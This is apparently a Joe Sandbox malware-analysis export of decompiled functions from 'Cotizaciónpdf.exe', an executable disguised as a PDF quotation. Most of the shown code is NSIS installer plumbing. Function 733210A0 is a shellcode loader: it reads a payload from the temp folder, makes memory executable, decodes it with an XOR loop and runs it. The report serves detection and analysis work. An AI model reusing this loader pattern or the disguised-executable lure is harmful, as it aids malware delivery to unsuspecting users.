String ID: 80A
API String ID: 2113905535-195308239
Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040302C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x3d425
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					_t12 =  *0x417040; // 0x3d7f9
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						_t22 =  *0x41f048; // 0x322eb
						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
						E00402BC5(0);
					}
					 *0x40afd0 = 0x40b038;
					 *0x40afd4 = 0x8000; // executed
					_t16 = E00405E9D(0x40afb0); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd0; // 0x40e5a5
					_t40 = _t39 - 0x40b038;
					if(_t40 == 0) {
						__eflags =  *0x40afcc; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x41703c; // 0x3d425
						if(_t18 -  *0x40afa8 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409014, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afa8 =  *0x40afa8 + _t40;
						_t53 =  *0x40afcc; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x00403030
0x0040303d
0x00403050
0x00403055
0x00403196
0x00403198
0x00000000
0x0040319e
0x00403061
0x00403074
0x0040307a
0x00403080
0x0040308b
0x0040308b
0x00403090
0x00403095
0x0040309d
0x0040309f
0x0040309f
0x004030a8
0x004030af
0x00000000
0x00000000
0x004030b5
0x004030bb
0x004030c1
0x00000000
0x004030c7
0x004030cd
0x004030d7
0x004030ed
0x004030f2
0x004030f7
0x004030fd
0x00403103
0x0040310d
0x00403114
0x00000000
0x00000000
0x00403116
0x0040311c
0x0040311e
0x00403152
0x00403158
0x00000000
0x00000000
0x0040315a
0x0040315c
0x00000000
0x00000000
0x0040315e
0x0040315e
0x00403171
0x00000000
0x00000000
0x00403180
0x00000000
0x00403180
0x0040312e
0x00403136
0x0040318d
0x00403193
0x00403193
0x00000000
0x0040313e
0x0040313e
0x00403144
0x0040314a
0x00000000
0x00000000
0x00000000
0x00403150
0x00403191
0x00403191
0x00000000
0x00403191
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403041

Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
WriteFile.KERNELBASE(0040B038,0040E5A5,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
SetFilePointer.KERNELBASE(0003D425,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180

Strings

80A, xrefs: 004030A1

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: 80A
API String ID: 2146148272-195308239
Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f51
0x00401f51
0x00401f56
0x00401f5d
0x0040200b
0x00402156
0x00402156
0x0040287d
0x00402880
0x0040288c
0x0040288c
0x00401f6c
0x00401f76
0x00401f79
0x00401f88
0x00401f8c
0x00401f92
0x00401f96
0x00402004
0x00000000
0x00402004
0x00401f98
0x00401fa2
0x00401fa6
0x00401fea
0x00401fa8
0x00401fab
0x00401fae
0x00401fde
0x00401fb0
0x00401fb3
0x00401fbc
0x00401fbe
0x00401fbe
0x00401fbc
0x00401fae
0x00401ff2
0x00401ff9
0x00401ff9
0x00000000
0x00401ff2
0x00401f7c
0x00401f82
0x00401f86
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x00402156
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x00402880
0x0040288c

APIs

Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,7519F560,004053BE,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,7519F560), ref: 0040561A
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-1943935188
Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E

Uniqueness

Uniqueness Score: -1.00%

Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x0040578f
0x00405795
0x00405796
0x00405796
0x00405797
0x0040579e
0x004057a8
0x004057b5
0x004057b8
0x004057c0
0x00000000
0x00000000
0x004057c4
0x00000000
0x00000000
0x004057c6
0x00000000
0x004057c6
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040579E
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8

Strings

nsa, xrefs: 00405797
C:\Users\user\AppData\Local\Temp\, xrefs: 0040578B, 0040578E
"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" , xrefs: 00405792

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-148463067
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5

Uniqueness

Uniqueness Score: -1.00%

Function 733210A0, Relevance: 6.1, APIs: 4, Instructions: 96
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E733210A0(void* __ecx, void* __eflags) {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				void* _v32;
				long _v36;
				long _v40;
				short _v1080;
				void _v6056;
				void* _t38;
				intOrPtr _t41;
				struct _OVERLAPPED* _t72;
				void* _t81;

				E73321000(0x17a4, __ecx);
				_v28 = 0x74;
				_v26 = 0x6d;
				_v24 = 0x64;
				_v22 = 0x76;
				_v20 = 0x7a;
				_v18 = 0x73;
				_v16 = 0x69;
				_v14 = 0x72;
				_v12 = 0x63;
				_v10 = 0x78;
				_v8 = 0;
				GetTempPathW(0x103,  &_v1080);
				E73321030( &_v1080,  &_v28);
				VirtualProtect( &_v6056, 0x1370, 0x40,  &_v36); // executed
				_t38 = CreateFileW( &_v1080, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v32 = _t38;
				ReadFile(_v32,  &_v6056, 0x1370,  &_v40, 0); // executed
				_t72 = 0;
				while(1) {
					_t41 =  *((intOrPtr*)(_t81 + _t72 - 0x17a4));
					if(_t72 == 0x1370) {
						break;
					}
					 *((char*)(_t81 + _t72 - 0x17a4)) = ((_t41 + 0x00000001 - 0x00000001 + 0x1ae - 0xffffffffffffff67 ^ 0x0000006d) + 0x0000009b ^ 0x65) - 0x21 + 0xe4 - 1 + 0xbe - 1;
					_t72 =  &(_t72->Internal);
				}
				_v6056();
				return 0;
			}

0x733210a8
0x733210b2
0x733210bb
0x733210c4
0x733210cd
0x733210d6
0x733210df
0x733210e8
0x733210f1
0x733210fa
0x73321103
0x73321109
0x73321119
0x7332112a
0x73321144
0x73321163
0x73321169
0x73321182
0x73321188
0x7332118d
0x7332118d
0x7332119a
0x00000000
0x00000000
0x733211c2
0x733211c9
0x733211c9
0x733211db
0x733211e2

APIs

GetTempPathW.KERNEL32(00000103,?), ref: 73321119
VirtualProtect.KERNELBASE(?,00001370,00000040,?), ref: 73321144
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 73321163
ReadFile.KERNELBASE(?,?,00001370,?,00000000), ref: 73321182

Memory Dump Source

Source File: 00000000.00000002.250669422.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000000.00000002.250664147.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250684133.0000000073322000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73320000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: File$CreatePathProtectReadTempVirtual
String ID:
API String ID: 205760209-0
Opcode ID: 53d91e39dc6b9b40d937fb344f077257492e45819dd67b50ddd5155209692a94
Instruction ID: 85809086431bdd118fcc8b8a333ad72808bdfe05273d0e7d472f7d1b575c1086
Opcode Fuzzy Hash: 53d91e39dc6b9b40d937fb344f077257492e45819dd67b50ddd5155209692a94
Instruction Fuzzy Hash: 02318671E142089AEB14DBA0CD51BEE7739EF54740F50906CE209EB2D0E67E5B02C76A

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004031f2
0x004031f8
0x004031fe
0x00403205
0x0040320a
0x00403212
0x0040321e
0x00403224
0x00403208
0x00403208
0x00403208

APIs

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212

Strings

1033, xrefs: 00403219
C:\Users\user\AppData\Local\Temp\, xrefs: 004031F2, 004031F7, 004031FD, 00403209, 00403211, 00403218

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2030658151
Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
